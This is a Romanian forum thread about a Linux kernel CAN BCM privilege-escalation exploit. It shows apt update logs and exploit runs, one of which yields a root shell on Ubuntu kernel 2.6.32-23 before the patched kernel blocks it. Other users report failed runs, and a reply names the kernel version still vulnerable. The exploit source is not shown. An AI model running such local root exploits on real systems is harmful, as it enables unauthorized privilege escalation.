run-parts: executing /etc/kernel/postinst.d/dkms 2.6.32-24-generic /boot/vmlinuz-2.6.32-24-generic
run-parts: executing /etc/kernel/postinst.d/nvidia-common 2.6.32-24-generic /boot/vmlinuz-2.6.32-24-generic
run-parts: executing /etc/kernel/postinst.d/pm-utils 2.6.32-24-generic /boot/vmlinuz-2.6.32-24-generic
Setting up linux-image-generic (2.6.32.24.25) ...
Setting up linux-generic (2.6.32.24.25) ...

linux-headers-generic:
The following extra packages will be installed:
linux-headers-2.6.32-24 linux-headers-2.6.32-24-generic
The following NEW packages will be installed:
linux-headers-2.6.32-24 linux-headers-2.6.32-24-generic
The following packages will be upgraded:
linux-headers-generic
1 upgraded, 2 newly installed, 0 to remove and 0 not upgraded.
Need to get 10.6MB of archives.
After this operation, 85.3MB of additional disk space will be used.
Do you want to continue [Y/n]? Y
Get:1 http://archive.ubuntu.com/ubuntu/ lucid-updates/main linux-headers-2.6.32-24 2.6.32-24.42 [9,879kB]
Get:2 http://archive.ubuntu.com/ubuntu/ lucid-updates/main linux-headers-2.6.32-24-generic 2.6.32-24.42 [740kB]
Get:3 http://archive.ubuntu.com/ubuntu/ lucid-updates/main linux-headers-generic 2.6.32.24.25 [4,022B]
Fetched 10.6MB in 6s (1,578kB/s)
Selecting previously deselected package linux-headers-2.6.32-24.
(Reading database ... 153043 files and directories currently installed.)
Unpacking linux-headers-2.6.32-24 (from .../linux-headers-2.6.32-24_2.6.32-24.42_all.deb) ...
Selecting previously deselected package linux-headers-2.6.32-24-generic.
Unpacking linux-headers-2.6.32-24-generic (from .../linux-headers-2.6.32-24-generic_2.6.32-24.42_i386.deb) ...
Preparing to replace linux-headers-generic 2.6.32.23.24 (using .../linux-headers-generic_2.6.32.24.25_i386.deb) ...
Unpacking replacement linux-headers-generic ...
Setting up linux-headers-2.6.32-24 (2.6.32-24.42) ...
Setting up linux-headers-2.6.32-24-generic (2.6.32-24.42) ...
Examining /etc/kernel/header_postinst.d.
run-parts: executing /etc/kernel/header_postinst.d/dkms 2.6.32-24-generic /boot/vmlinuz-2.6.32-24-generic
run-parts: executing /etc/kernel/header_postinst.d/nvidia-common 2.6.32-24-generic /boot/vmlinuz-2.6.32-24-generic
Setting up linux-headers-generic (2.6.32.24.25) ...

Si un clean-up: apt-get autoremove

Acum exploit-ul incercat (pentru a n oara):

eval@eval-laptop:/tmp/exploit$ ls
evil_exploit expl.c
eval@eval-laptop:/tmp/exploit$ ./evil_exploit
[+] looking for symbols...
[+] resolved symbol commit_creds to 0xc016dd80
[+] resolved symbol prepare_kernel_cred to 0xc016e0c0
[+] setting up exploit payload...
[+] creating PF_CAN socket...
[+] connecting PF_CAN socket...
[+] clearing out any active OPs via RX_DELETE...
[+] removing any active user-owned shmids...
[+] massaging kmalloc-96 SLUB cache with dummy allocations
[+] corrupting BCM OP with truncated allocation via RX_SETUP...
[+] mmap'ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec...
[+] mmap'ed mapping of length 328 at 0xb779a000
[+] smashing adjacent shmid with dummy payload via malformed RX_SETUP...
[+] seeking out the smashed shmid_kernel...
[+] discovered our smashed shmid_kernel at shmid[152] = 5636263
[+] re-smashing the shmid_kernel with exploit payload...
[+] launching root shell!
root@eval-laptop:/tmp/exploit# id
uid=0(root) gid=0(root)
root@eval-laptop:/tmp/exploit# uname -a
Linux eval-laptop 2.6.32-23-generic #37-Ubuntu SMP Fri Jun 11 07:54:58 UTC 2010 i686 GNU/Linux
root@eval-laptop:/tmp/exploit# cat /etc/issue
Ubuntu 10.04.1 LTS \n \l
root@eval-laptop:/tmp/exploit#

Deci ceva este in neregula. Ce poate sa fie?

Pe langa asta am observat ca era port 631 @ TCP deschis (IPP), am rezolvat problema urmand pasii descrisi aici: http://ubuntuforums.org/showthread.php?t=337868 .

root@eval-laptop:/home/eval# apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
root@eval-laptop:/home/eval# apt-get update
Hit http://archive.canonical.com lucid Release.gpg
Ign http://archive.canonical.com/ubuntu/ lucid/partner Translation-en_US
Hit http://archive.ubuntu.com lucid Release.gpg
Ign http://archive.ubuntu.com/ubuntu/ lucid/main Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid/restricted Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid/universe Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid/multiverse Translation-en_US
Hit http://archive.ubuntu.com lucid-updates Release.gpg
Ign http://archive.ubuntu.com/ubuntu/ lucid-updates/main Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid-updates/restricted Translation-en_US
Hit http://archive.canonical.com lucid Release
Ign http://archive.ubuntu.com/ubuntu/ lucid-updates/universe Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid-updates/multiverse Translation-en_US
Hit http://archive.ubuntu.com lucid-security Release.gpg
Ign http://archive.ubuntu.com/ubuntu/ lucid-security/main Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid-security/restricted Translation-en_US
Hit http://archive.canonical.com lucid/partner Packages
Ign http://archive.ubuntu.com/ubuntu/ lucid-security/universe Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid-security/multiverse Translation-en_US
Hit http://archive.ubuntu.com lucid Release
Hit http://archive.ubuntu.com lucid-updates Release
Hit http://archive.canonical.com lucid/partner Sources
Hit http://archive.ubuntu.com lucid-security Release
Hit http://archive.ubuntu.com lucid/main Packages
Hit http://archive.ubuntu.com lucid/restricted Packages
Hit http://archive.ubuntu.com lucid/main Sources
Hit http://archive.ubuntu.com lucid/restricted Sources
Hit http://archive.ubuntu.com lucid/universe Packages
Hit http://archive.ubuntu.com lucid/universe Sources
Hit http://archive.ubuntu.com lucid/multiverse Packages
Hit http://archive.ubuntu.com lucid/multiverse Sources
Hit http://archive.ubuntu.com lucid-updates/main Packages
Hit http://archive.ubuntu.com lucid-updates/restricted Packages
Hit http://archive.ubuntu.com lucid-updates/main Sources
Hit http://archive.ubuntu.com lucid-updates/restricted Sources
Hit http://archive.ubuntu.com lucid-updates/universe Packages
Hit http://archive.ubuntu.com lucid-updates/universe Sources
Hit http://archive.ubuntu.com lucid-updates/multiverse Packages
Hit http://archive.ubuntu.com lucid-updates/multiverse Sources
Hit http://archive.ubuntu.com lucid-security/main Packages
Hit http://archive.ubuntu.com lucid-security/restricted Packages
Hit http://archive.ubuntu.com lucid-security/main Sources
Hit http://archive.ubuntu.com lucid-security/restricted Sources
Hit http://archive.ubuntu.com lucid-security/universe Packages
Hit http://archive.ubuntu.com lucid-security/universe Sources
Hit http://archive.ubuntu.com lucid-security/multiverse Packages
Hit http://archive.ubuntu.com lucid-security/multiverse Sources
Reading package lists... Done
root@eval-laptop:/home/eval#

Mda, si acum imi mai ignora unele surse.

/etc/apt/sources.list:
# deb cdrom:[ubuntu 10.04 LTS _Lucid Lynx_ - Release i386 (20100429)]/ lucid main restricted
# See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to
# newer versions of the distribution.
deb http://archive.ubuntu.com/ubuntu lucid main restricted
deb-src http://archive.ubuntu.com/ubuntu lucid main restricted
## Major bug fix updates produced after the final release of the
## distribution.
deb http://archive.ubuntu.com/ubuntu lucid-updates main restricted
deb-src http://archive.ubuntu.com/ubuntu lucid-updates main restricted
## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu
## team. Also, please note that software in universe WILL NOT receive any
## review or updates from the Ubuntu security team.
deb http://archive.ubuntu.com/ubuntu lucid universe
deb-src http://archive.ubuntu.com/ubuntu lucid universe
deb http://archive.ubuntu.com/ubuntu lucid-updates universe
deb-src http://archive.ubuntu.com/ubuntu lucid-updates universe
## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu
## team, and may not be under a free licence. Please satisfy yourself as to
## your rights to use the software. Also, please note that software in
## multiverse WILL NOT receive any review or updates from the Ubuntu
## security team.
deb http://archive.ubuntu.com/ubuntu lucid multiverse
deb-src http://archive.ubuntu.com/ubuntu lucid multiverse
deb http://archive.ubuntu.com/ubuntu lucid-updates multiverse
deb-src http://archive.ubuntu.com/ubuntu lucid-updates multiverse
## Uncomment the following two lines to add software from the 'backports'
## repository.
## N.B. software from this repository may not have been tested as
## extensively as that contained in the main release, although it includes
## newer versions of some applications which may provide useful features.
## Also, please note that software in backports WILL NOT receive any review
## or updates from the Ubuntu security team.
# deb http://ro.archive.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse
# deb-src http://ro.archive.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse
## Uncomment the following two lines to add software from Canonical's
## 'partner' repository.
## This software is not part of Ubuntu, but is offered by Canonical and the
## respective vendors as a service to Ubuntu users.
deb http://archive.canonical.com/ubuntu lucid partner
deb-src http://archive.canonical.com/ubuntu lucid partner
deb http://archive.ubuntu.com/ubuntu lucid-security main restricted
deb-src http://archive.ubuntu.com/ubuntu lucid-security main restricted
deb http://archive.ubuntu.com/ubuntu lucid-security universe
deb-src http://archive.ubuntu.com/ubuntu lucid-security universe
deb http://archive.ubuntu.com/ubuntu lucid-security multiverse
deb-src http://archive.ubuntu.com/ubuntu lucid-security multiverse

Nu inteleg unde este problema.

Dist-upgrade:

apt-get dist-upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
Calculating upgrade... Done
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.

OK, sper ca asta este ultimul edit, m-am cam saturat deja si mi-a dat cateva batai de cap, trebuia sa mai bifez ceva in "Software Sources" si anume "Pre-released updates":

Intr-un final dupa un restart (fortat):

root@eval-laptop:/home/eval# apt-get update
Hit http://archive.canonical.com lucid Release.gpg
Ign http://archive.canonical.com/ubuntu/ lucid/partner Translation-en_US
Hit http://archive.ubuntu.com lucid Release.gpg
Ign http://archive.ubuntu.com/ubuntu/ lucid/main Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid/restricted Translation-en_US
Hit http://archive.canonical.com lucid Release
Ign http://archive.ubuntu.com/ubuntu/ lucid/universe Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid/multiverse Translation-en_US
Hit http://archive.ubuntu.com lucid-updates Release.gpg
Ign http://archive.ubuntu.com/ubuntu/ lucid-updates/main Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid-updates/restricted Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid-updates/universe Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid-updates/multiverse Translation-en_US
Hit http://archive.ubuntu.com lucid-security Release.gpg
Ign http://archive.ubuntu.com/ubuntu/ lucid-security/main Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid-security/restricted Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid-security/universe Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid-security/multiverse Translation-en_US
Hit http://archive.ubuntu.com lucid-proposed Release.gpg
Ign http://archive.ubuntu.com/ubuntu/ lucid-proposed/restricted Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid-proposed/main Translation-en_US
Ign http://archive.ubuntu.com/ubuntu/ lucid-proposed/multiverse Translation-en_US
Hit http://archive.canonical.com lucid/partner Packages
Ign http://archive.ubuntu.com/ubuntu/ lucid-proposed/universe Translation-en_US
Hit http://archive.ubuntu.com lucid Release
Hit http://archive.ubuntu.com lucid-updates Release
Hit http://archive.canonical.com lucid/partner Sources
Hit http://archive.ubuntu.com lucid-security Release
Hit http://archive.ubuntu.com lucid-proposed Release
Hit http://archive.ubuntu.com lucid/main Packages
Hit http://archive.ubuntu.com lucid/restricted Packages
Hit http://archive.ubuntu.com lucid/main Sources
Hit http://archive.ubuntu.com lucid/restricted Sources
Hit http://archive.ubuntu.com lucid/universe Packages
Hit http://archive.ubuntu.com lucid/universe Sources
Hit http://archive.ubuntu.com lucid/multiverse Packages
Hit http://archive.ubuntu.com lucid/multiverse Sources
Hit http://archive.ubuntu.com lucid-updates/main Packages
Hit http://archive.ubuntu.com lucid-updates/restricted Packages
Hit http://archive.ubuntu.com lucid-updates/main Sources
Hit http://archive.ubuntu.com lucid-updates/restricted Sources
Hit http://archive.ubuntu.com lucid-updates/universe Packages
Hit http://archive.ubuntu.com lucid-updates/universe Sources
Hit http://archive.ubuntu.com lucid-updates/multiverse Packages
Hit http://archive.ubuntu.com lucid-updates/multiverse Sources
Hit http://archive.ubuntu.com lucid-security/main Packages
Hit http://archive.ubuntu.com lucid-security/restricted Packages
Hit http://archive.ubuntu.com lucid-security/main Sources
Hit http://archive.ubuntu.com lucid-security/restricted Sources
Hit http://archive.ubuntu.com lucid-security/universe Packages
Hit http://archive.ubuntu.com lucid-security/universe Sources
Hit http://archive.ubuntu.com lucid-security/multiverse Packages
Hit http://archive.ubuntu.com lucid-security/multiverse Sources
Hit http://archive.ubuntu.com lucid-proposed/restricted Packages
Hit http://archive.ubuntu.com lucid-proposed/main Packages
Hit http://archive.ubuntu.com lucid-proposed/multiverse Packages
Hit http://archive.ubuntu.com lucid-proposed/universe Packages
Reading package lists... Done
root@eval-laptop:/home/eval# apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
root@eval-laptop:/home/eval# uname -a
Linux eval-laptop 2.6.32-25-generic #43-Ubuntu SMP Wed Sep 1 09:46:39 UTC 2010 i686 GNU/Linux
root@eval-laptop:/home/eval# cat /etc/issue
Ubuntu 10.04.1 LTS \n \l
root@eval-laptop:/home/eval# exit
exit
eval@eval-laptop:~$

Am 2.6.32-25-generic. Am sa incerc iar exploit-ul si revin cu edit.

[Final edit -- hooray] WIN!

eval@eval-laptop:/tmp/exploit$ id
uid=1000(eval) gid=1000(eval) groups=4(adm),20(dialout),24(cdrom),46(plugdev),105(lpadmin),119(admin),122(sambashare),1000(eval)
eval@eval-laptop:/tmp/exploit$ ./evil_expl0it
[+] looking for symbols...
[+] resolved symbol commit_creds to 0xc016dfe0
[+] resolved symbol prepare_kernel_cred to 0xc016e320
[+] setting up exploit payload...
[+] creating PF_CAN socket...
[+] connecting PF_CAN socket...
[+] clearing out any active OPs via RX_DELETE...
[+] removing any active user-owned shmids...
[+] massaging kmalloc-96 SLUB cache with dummy allocations
[+] corrupting BCM OP with truncated allocation via RX_SETUP...
[-] kernel rejected malformed CAN header
eval@eval-laptop:/tmp/exploit$ id
uid=1000(eval) gid=1000(eval) groups=4(adm),20(dialout),24(cdrom),46(plugdev),105(lpadmin),119(admin),122(sambashare),1000(eval)
eval@eval-laptop:/tmp/exploit$ # -- fixed!

Zatarra · September 2, 2010

Update-ul depinde in mare parte de repositories, el practic de acolo ia ce ii nou.

Zatarra · September 6, 2010

Nu pot sa cred.. inca un fail

book@portia:~$ uname -a
Linux portia 2.6.32-24-generic-pae #41-Ubuntu SMP Thu Aug 19 02:43:57 UTC 2010 i686 GNU/Linux
book@portia:~$ gcc a.c -o a
book@portia:~$ chmod +x a
book@portia:~$ ./a
[+] looking for symbols...
[+] resolved symbol commit_creds to 0xc0176210
[+] resolved symbol prepare_kernel_cred to 0xc0176550
[+] setting up exploit payload...
[+] creating PF_CAN socket...
[+] connecting PF_CAN socket...
[+] clearing out any active OPs via RX_DELETE...
[+] removing any active user-owned shmids...
[+] massaging kmalloc-96 SLUB cache with dummy allocations
[+] corrupting BCM OP with truncated allocation via RX_SETUP...
[-] kernel rejected malformed CAN header
book@portia:~$ id
uid=1019(book) gid=1002(company) groups=1002(company)
book@portia:~$

Flubber · September 7, 2010

Probabil ca la kernel 2.6.32-24 a fost rezolvata problema.

Ia incearca si pe unul 2.6.32-23. Si o sa iti mearga.

Asa cum spunea si pyth0n3, totul se rezuma la Kernel Symbol Table.

Sign In

Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit

Recommended Posts

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Join the conversation